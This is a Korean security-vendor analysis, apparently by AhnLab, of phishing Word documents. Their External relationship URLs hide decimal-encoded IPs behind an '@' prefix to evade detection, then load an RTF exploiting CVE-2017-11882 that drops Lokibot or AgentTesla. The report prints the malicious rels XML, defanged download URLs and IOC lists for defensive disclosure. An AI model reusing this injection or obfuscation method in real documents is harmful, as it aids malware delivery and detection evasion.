진단 회피를 목적으로 교묘하게 조작된 워드파일 유포 (External+RTF)

MS Office Word 문서의 External 외부 연결 접속을 가능한 점을 이용하여, 추가적인 RTF 악성코드를 유포하는 악성 워드파일은 꽤 오래전부터 지속적으로 확인되어왔다. 하지만, 최근 안티바이러스 제품의 진단을 회피하기 위한 것으로 추정되는 파일들이 국내에 다수 유포되는 정황이 확인되어 이를 알리고자 한다.

그림 1) 업무상 목적으로 위장한 이메일

업무상 목적으로 위장한 이메일에 워드파일을 첨부한 것은 크게 다르지 않으나, OOXML(Office Open XML) 포맷 내부에서 확인할 수 있는 webSettings.xml.rels 파일에서 특이점이 존재한다. 아래와 같이 문서 실행 시 자동으로 연결되는 External URL은 그동안 유포되던 일반적인 형태의 URL이 아님을 알 수 있다.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="hxxp://zzzxcaaqwszazzxczxcadsqqazzxczczzzxqwaazzazxsaqwsaa@3221[45]7063/zxxsaassswq__zzzaxxsccvb__zxxxswqaaxxzzza_sdadzzqwqzzxs_dasdzsadasdas/zzxxxz_z_xcccc_zxxz[.]doc" TargetMode="External"/></Relationships>
그림 2) 웹브라우저 상 URL 자동변환결과

해당 URL을 웹브라우저에 입력 시 그림 2) 와 같이 URL의 @ 앞부분은 삭제되고 @ 뒷부분에 있는 숫자는 자동으로 IP 형식으로 변환된다.

URL 상에서 @ 앞부분이 삭제되는 배경은 다음과 같다. IE 버전 3.0~6.0까지는 아래와 같은 URL을 입력하는 시도에 대해 기본 인증방법을 이용하는 사이트에 사용자 정보(username:password)를 자동으로 보낼 수 있었다.
특정 보안 업데이트(MS 832894 릴리즈)가 이루어진 뒤부터 URL의 해당 영역(@ 기호 앞부분)이 무시되는 것인데, 공격자는 이러한 점을 악용하여 @ 뒷부분에 유의미한 데이터(IP로 변환될 수 있는 십진수)를 기재한 것으로 판단된다. 관련된 상세 내용은 Microsoft 기술문서에서 확인 할 수 있다.

  • http(s)://username:password@server/resource.txt
그림 3) Microsoft 기술문서 일부 발췌

최근 2주간 국내에 유포된 것으로 확인되는 다수의 워드파일에서 위와 같은 유형의 URL이 확인되었다.

  • hxxp://zzzxcaaqwszazzxczxcadsqqazzxczczzzxqwaazzazxsaqwsaa@3221[45]7063/zxxsaassswq__zzzaxxsccvb__zxxxswqaaxxzzza_sdadzzqwqzzxs_dasdzsadasdas/zzxxxz_z_xcccc_zxxz[.]doc
  • hxxp://sdkjfksfjkjeigufdhgkfdgkhekhjhdfgkdgkhcicivbihberigidfghidgi@3236[13]5982/ego1/document_ego[.]doc
  • hxxp://docment_dosc@3323[44]4136/uAuuUASDbjasduhuasduyuASHUDHUSAD
  • hxxp://uUAzzyqqazzxxbbvvbdhsgfhdshqzbsdnsdzsfbnsdfgh@3221[44]8056/uuUAzzyqqazzxxbbvvbdhsgfhdshqzbsdnsdzsfbnsdfghdsfh/zxxaawazzzawwwazzasqwazzas[.]doc
  • hxxp://zzxaaqwwweerss@1428[10]6757/zzxaaqwwweerrrrsszzxxzaaqqwwaaaqqzzzssweeessszzaazzswwe/zzxaaqwwweerrrrsszzxxzaaqqwwaaaq[.]doc
  • hxxp://zqwerdfgvcbzasdcxssqwsedcfvfrdsaswwszawws@3221[44]8061/zxsswweerrss_zaqsddff_zxcvbfdd_qaszxxcc_zaswssxcv/zqasxxcvvfd_zqwwsdcxv[.]doc
  • hxxp://wwerwerwrwerjasduhuasduyuASHUDHUSADHUASDU@3323[44]4136/zzwweqwwerwerwrwerjasduhuasduyuASHUDHUSADHUASDU/zaawqqqaazzzxcvbbvgtttyhhjjg[.]doc
  • hxxp://aszqasdhjahsdjqzzaszwqasdasdasdjhj@2709[59]7246/ziioooooeroiooisodfo___————sdfjhjjhjhjhhj/ziiuewirisdfjhfjh[.]doc
  • hxxp://aszqasdhjahsdjqzzaszwqasdasdasdjhj@1806[43]5509/ziioooooeroiooisodfo__———_—sdfjhjjhjhjhhj/zppolldookfodfdfdf_o[.]doc
  • hxxp://zxqwsszzxxcvbfggzzzassqqweezzasszzzewwwsdzzzs@1755[84]8835/zxxswqqeerrdde_sdfsdf_zaqqwaa_zxzxssds/zxccvddqaa_szzxcxccx[.]doc
  • hxxp://wwerwerwrwerjasduhuasduyuASHUDHUSADHUASDU@3323[44]4136/zzwweqwwerwerwrwerjasduhuasduyuASHUDHUSADHUASDU/zaawqqqaazzzxcvbbvgtttyhhjjg[.]doc

변환원리에 대해 간단히 설명하면 다음과 같다. IP 주소(IPv4)는 8비트(=octet)를 기준으로 구분되는 32비트로 이루어진 2진수 조합으로 구성되어있다. 2진수 조합(ex. 11000000)을 실제 입력하여 사용하는 것은 매우 불편하므로 2진수에 대응되는 10진수 숫자(ex. 192)를 사용하는데, 우리가 사용하는 보편적인 웹접근 방법은 10진수에 대응되는 도메인을 활용하는 것이다.

이렇게 DNS Lookup 이 이루어지는 과정을 역으로 접근해보면, External URL 에 존재하는 10진수 ‘3221457063’ 는 octet 단위에 맞춰 2진수 ‘11000000 00000011 10001000 10100111’ 로 변환되고 앞자리부터 ‘192 3 136 167’ 이 되어 변환됨을 알 수 있다.

그림 4) External URL 연결과정

즉, External URL이 변환되는 과정을 정리하면 다음과 같다.

그림 5) 입력URL이 변환되는 과정

최근 유포되고 있는 이러한 형식의 URL은 RTF 바이너리를 최초 실행했던 워드파일에 로드 후 CVE-2017-11882 로 알려진 과거 RTF 취약점을 사용하고 있으며, 최종적으로는 Lokibot, AgentTesla 와 같은 다양한 인포스틸러 악성코드를 내려받게 한다.

워드 문서를 실행 시 연결 시도가 발생한 것 자체로는 External URL을 이용하여 유포된 다른 파일들과 동일한 악성행위로 보여질 수 있으나, 분석 및 진단 관점에서는 공격자가 내부파일에 대한 진단회피 목적으로 External URL의 포맷을 변형하는 것으로 판단된다.

사용자는 V3를 최신 버전으로 업데이트하여 사용하고 출처가 불분명한 문서파일 실행을 자제해야 한다.

[파일 진단]
– Downloader/XML.External.S1942 (2022.10.25.02)
– Trojan/Win.Generic.C5290118 (2022.11.03.00)
– Trojan/Win.MSIL.R510204 (2022.10.27.01)
– RTF/Malform-A.Gen (2018.07.03)

[행위 진단]
– Malware/MDP.Download.M1881

[IOC]
MD5
– 655dc599da82d7acfd5f35683c3fe128 : 악성 워드 문서
– 402d0dc1120c20d21a539bd8d564a6c0 : RTF 바이너리
– 471130cf70d5bc013d818098fb55749a : Lokibot 바이너리

C&C 및 다운로드
– hxxp://192.3.136[.]167/zxxsaassswq__zzzaxxsccvb__zxxxswqaaxxzzza_sdadzzqwqzzxs_dasdzsadasdas/zzxxxz_z_xcccc_zxxz.doc
– hxxp://192.3.136[.]167/322/vbc.exe
– hxxp://208.67.105[.]162/perez/five/fre.php
– hxxp://192.227.132[.]46/
– hxxp://192.3.101[.]120/
– hxxp://85.31.46[.]5/
– hxxp://192.3.101[.]125/
– hxxp://198.23.187[.]168/
– hxxp://161.129.44[.]62/
– hxxp://107.172.4[.]181/
– hxxp://104.168.32[.]131/
– hxxp://198.23.187[.]168/

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

0 0 votes
별점 주기
Subscribe
Notify of
guest

0 댓글
Inline Feedbacks
View all comments